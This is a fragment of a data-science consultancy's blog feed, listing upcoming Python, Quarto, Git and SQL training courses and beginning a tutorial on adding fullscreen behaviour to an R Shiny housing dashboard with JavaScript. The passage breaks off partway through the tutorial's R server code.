&lt;p&gt;The benefit of using a programming language such as Python is that we can automate repetitive tasks. This course covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;this course&lt;/a&gt;, you will understand what these techniques are and how they can be applied to solve real-world data wrangling tasks.&lt;/p&gt;
&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 4th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving on to complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;h4 id="machine-learning-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning-modelling-scikit-learn/" rel="external"&gt;Machine Learning with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 16th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python (along with R) has become the dominant language in machine learning and data science. &lt;a href="https://www.jumpingrivers.com/training/course/python-machine-learning-modelling-scikit-learn/" rel="external"&gt;This course&lt;/a&gt; will equip you with the knowledge and tools to undertake a variety of tasks in a standard machine learning pipeline. We stress the importance of data preparation, both in terms of data standardisation and feature selection, before tackling model building.&lt;/p&gt;
&lt;h3 id="other-courses"&gt;Other courses&lt;/h3&gt;
&lt;p&gt;We are also offering several language-agnostic courses spanning automated reporting with Quarto, version control with Git, and relational databases with SQL.&lt;/p&gt;
&lt;h4 id="reporting-with-quarto"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 14th August 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you create interactive documents that always need to be updated when the data changes? Then &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;this course&lt;/a&gt; is for you. In this course you will learn how to use Quarto to create high quality, dynamic, fully reproducible documents. Quarto is a multi-language open source publishing tool that allows for the creation of dynamic content with Python, R, Julia and Observable.&lt;/p&gt;
&lt;h4 id="git-for-me"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;Git for Me&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;When working on data analysis projects, version control is essential for tracking progress and supporting collaboration. During &lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/" rel="external"&gt;this course&lt;/a&gt; we will show you multiple ways to integrate version control into your project with Git. You will gain an understanding of how to use online code sharing websites such as GitHub / GitLab, along with best practices for doing so.&lt;/p&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 20th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will start by querying a local database before connecting to a remote database held on an AWS server. Here, we will stress important considerations when working with shared databases in the cloud.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Fullscreen Ahead for Shiny Applications</title><link>https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/</link><pubDate>Thu, 08 Jun 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
aside {
background-color: #eeeeee;
padding: 1em;
}
.blog-content aside h3 {
color: black;
font-size: 24px;
}
&lt;/style&gt;
&lt;p&gt;Browsers have been implementing variations on a JavaScript fullscreen API for over a decade. Unfortunately, for much of that time the APIs varied across browsers. This made actually using it in production somewhat cumbersome.&lt;/p&gt;
&lt;p&gt;Finally, with the release of Safari 16.4 in March 2023, the &lt;a href="https://caniuse.com/fullscreen" rel="external"&gt;latest versions&lt;/a&gt; of all major desktop browsers support a single, standardized interface. Legacy versions of Safari for desktop are still in use, and there&amp;rsquo;s still no support at all for the Fullscreen API on iPhones. So while you can cover most users with the standardized API, it should be treated as a &lt;a href="https://developer.mozilla.org/en-US/docs/Glossary/Progressive_Enhancement" rel="external"&gt;progressive enhancement&lt;/a&gt; and not as a fundamental requirement for operating an application.&lt;/p&gt;
&lt;p&gt;In this post I&amp;rsquo;m going to show how we can enhance a toy Shiny application with fullscreen behaviour using only a few lines of JavaScript. Unfortunately, I did have issues using the fullscreen API with the browser that comes with RStudio: while at least some of the methods exist, calling them led to errors being thrown. Because of this, we will launch the app we build straight into the system&amp;rsquo;s default browser.&lt;/p&gt;
&lt;p&gt;You can find all the code on our &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;GitHub blog repository&lt;/a&gt; under &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/fullscreen-shiny" rel="external"&gt;&amp;ldquo;fullscreen-shiny&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
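&lt;p&gt;To make the progressive enhancement point concrete, here is a minimal sketch of how a page might check for the standardized API before offering fullscreen. The helper names &lt;code&gt;canUseFullscreen&lt;/code&gt; and &lt;code&gt;toggleFullscreen&lt;/code&gt; are hypothetical and are not taken from the code in this post; &lt;code&gt;fullscreenEnabled&lt;/code&gt;, &lt;code&gt;fullscreenElement&lt;/code&gt;, &lt;code&gt;requestFullscreen()&lt;/code&gt; and &lt;code&gt;exitFullscreen()&lt;/code&gt; are the standard names. The document is passed in as an argument, which is an assumption made here so the logic can be tried outside a browser.&lt;/p&gt;

```javascript
// Hypothetical helpers sketching progressive enhancement for fullscreen.
// `doc` is passed in (normally the global `document`) so the logic can be
// exercised with a stand-in object outside a browser.

// True only when the standardized Fullscreen API is present and allowed.
function canUseFullscreen(doc) {
  if (!doc) {
    return false;
  }
  return doc.fullscreenEnabled === true;
}

// Enter fullscreen for `element`, or leave it if `element` is already
// fullscreen. Resolves to "unsupported", "entered" or "exited".
function toggleFullscreen(doc, element) {
  if (!canUseFullscreen(doc)) {
    // No fullscreen available: the page simply carries on as normal.
    return Promise.resolve("unsupported");
  }
  if (doc.fullscreenElement === element) {
    return doc.exitFullscreen().then(function () {
      return "exited";
    });
  }
  return element.requestFullscreen().then(function () {
    return "entered";
  });
}
```

&lt;p&gt;In a page this could be called from a user-triggered event handler as &lt;code&gt;toggleFullscreen(document, element)&lt;/code&gt;. A real handler would probably also want to catch a rejected promise, since browsers can refuse a fullscreen request.&lt;/p&gt;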
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-fullscreen-r-shiny-javascript-api"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="the-shiny-app"&gt;The Shiny App&lt;/h2&gt;
&lt;p&gt;For the toy Shiny application we&amp;rsquo;ll use the &lt;a href="https://ggplot2.tidyverse.org/reference/txhousing.html" rel="external"&gt;&lt;code&gt;txhousing&lt;/code&gt; dataset&lt;/a&gt; from {ggplot2}. The full R code is provided below, but the &lt;code&gt;ui&lt;/code&gt; function is the most relevant bit:&lt;/p&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;library&lt;/code&gt; imports&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./app.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;shiny&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;glue&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Launch in system&amp;#39;s default browser&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;options&lt;/span&gt;(shiny.launch.browser &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .rs.invokeShinyWindowExternal)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details open&gt;&lt;summary&gt;&lt;code&gt;ui&lt;/code&gt; function&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;link&lt;/span&gt;(rel &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;stylesheet&amp;#34;&lt;/span&gt;, href &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;style.css&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;script&lt;/span&gt;(src &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;fullscreen.js&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;titlePanel&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Texas housing dashboard&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sidebarPanel&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;selectInput&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;city&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;City&amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(txhousing&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;city), selectize &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mainPanel&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;salesPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;volumePlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;medianPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tags&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;div&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;plotOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;listingsPlot&amp;#34;&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;100%&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;class&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;plot-container&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tabindex&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;0&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;details&gt;&lt;summary&gt;&lt;code&gt;server&lt;/code&gt; function&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; baseData &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; txhousing &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; volume &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; volume &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; median &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; median &lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; date &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{year}-{month}-01&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;%Y-%m-%d&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactive&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; baseData &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(city &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;city)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.Date&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2000-01-01&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;2015-07-01&amp;#34;&lt;/span&gt;), &lt;span style="color:#a5d6ff"&gt;&amp;#34;%Y-%m-%d&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; formatLabels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(label) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_pad&lt;/span&gt;(label, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, pad &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34; &amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; createPlot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(data, yProp, yTitle) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_line&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; date, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .data[[yProp]])) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; yTitle) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_x_date&lt;/span&gt;(limits &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dates,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; expand &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;expansion&lt;/span&gt;(mult &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.025&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;))) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_y_continuous&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; formatLabels,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; limits &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
